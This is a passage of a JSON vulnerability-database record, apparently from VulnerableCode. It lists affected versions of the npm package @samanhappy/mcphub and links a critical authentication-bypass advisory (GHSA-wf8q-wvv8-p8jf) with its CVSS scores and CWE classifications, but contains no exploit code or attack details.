"is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.8.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/861864?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.8.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.8.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/861865?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/861866?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/861867?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/861868?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/861869?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/861870?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/861871?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/861872?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/861873?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/861874?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/34086?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" }, { "vulnerability": "VCID-usx6-j1jv-p3a9" }, { "vulnerability": "VCID-yvc7-97ny-wkgy" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/861875?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.11" }, { "url": "http://public2.vulnerablecode.io/api/packages/1007221?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.12", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.12" }, { "url": "http://public2.vulnerablecode.io/api/packages/1007222?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.13" }, { "url": "http://public2.vulnerablecode.io/api/packages/1007223?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.14" }, { "url": "http://public2.vulnerablecode.io/api/packages/1007224?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.15", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.15" }, { "url": "http://public2.vulnerablecode.io/api/packages/1007225?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.9.16", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.9.16" }, { "url": "http://public2.vulnerablecode.io/api/packages/1007226?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.10.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.10.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/1007227?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.10.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.10.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1007228?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.10.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.10.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/1007229?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.10.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.10.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/1007230?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.10.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.10.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/1007231?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.10.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.10.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1007232?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.10.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" }, { "vulnerability": "VCID-dnq5-b1xm-7kh2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.10.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/373331?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.11.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024219?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.11.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024220?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.11.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024221?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.11.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024222?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.11.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024223?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.11.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024224?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.11.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024225?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.11.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024226?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.11.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024227?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.11.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024228?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.11.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024229?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.11.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.11" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024230?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.11.12", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.12" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024231?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.11.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.11.13" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024232?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024233?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024234?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024235?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024236?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024237?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024238?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024239?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024240?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024241?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024242?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024243?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.11" }, { "url": "http://public2.vulnerablecode.io/api/packages/1024244?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.12", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" }, { "vulnerability": "VCID-ctc9-v5xx-dfg7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.12" }, { "url": "http://public2.vulnerablecode.io/api/packages/373419?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.13" }, { "url": "http://public2.vulnerablecode.io/api/packages/1166914?format=api", "purl": "pkg:npm/%40samanhappy/mcphub@0.12.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3cmx-144n-mucv" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540samanhappy/mcphub@0.12.14" } ], "references": [ { "reference_url": "https://github.com/samanhappy/mcphub/releases/tag/v0.12.15", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/samanhappy/mcphub/releases/tag/v0.12.15" }, { "reference_url": "https://github.com/samanhappy/mcphub/security/advisories/GHSA-wf8q-wvv8-p8jf", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/samanhappy/mcphub/security/advisories/GHSA-wf8q-wvv8-p8jf" }, { "reference_url": "https://github.com/advisories/GHSA-wf8q-wvv8-p8jf", "reference_id": "GHSA-wf8q-wvv8-p8jf", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wf8q-wvv8-p8jf" } ], "weaknesses": [ { "cwe_id": 290, "name": "Authentication Bypass by Spoofing", "description": "This attack-focused weakness is caused by incorrectly implemented authentication schemes that are subject to spoofing attacks." }, { "cwe_id": 937, "name": "OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013." }, { "cwe_id": 1035, "name": "OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017." } ], "exploits": [], "severity_range_score": "9.0 - 10.0", "exploitability": "0.5", "weighted_severity": "9.0", "risk_score": 4.5, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3cmx-144n-mucv" }